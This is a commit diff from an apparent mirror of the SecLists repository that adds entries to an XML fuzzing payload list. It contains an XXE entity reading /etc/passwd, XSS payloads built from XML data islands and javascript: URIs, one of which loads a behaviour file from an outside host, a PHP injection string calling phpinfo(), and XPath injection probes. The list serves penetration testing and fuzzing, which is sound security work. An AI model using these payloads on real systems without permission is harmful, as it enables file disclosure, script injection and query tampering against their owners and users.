mirror of
https://github.com/danielmiessler/SecLists
synced 2026-01-30 12:13:06 +01:00
Update XML_FUZZ
Adding some payloads
This commit is contained in:
parent
9e5c7ad7ba
commit
3570ebcd2f
1 changed files with 7 additions and 0 deletions
|
|
@ -11,6 +11,11 @@
|
|||
]>
|
||||
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
|
||||
]>
|
||||
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
||||
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
||||
<name>','')); phpinfo(); exit;/*</name>
|
||||
|
||||
|
||||
## Element and Attrib Values
|
||||
|
|
@ -48,3 +53,5 @@ false
|
|||
{{Tnn96}}
|
||||
{= Tnn96}
|
||||
{{= Tnn96}}
|
||||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
||||
|
|
|
|||
Loading…
Reference in a new issue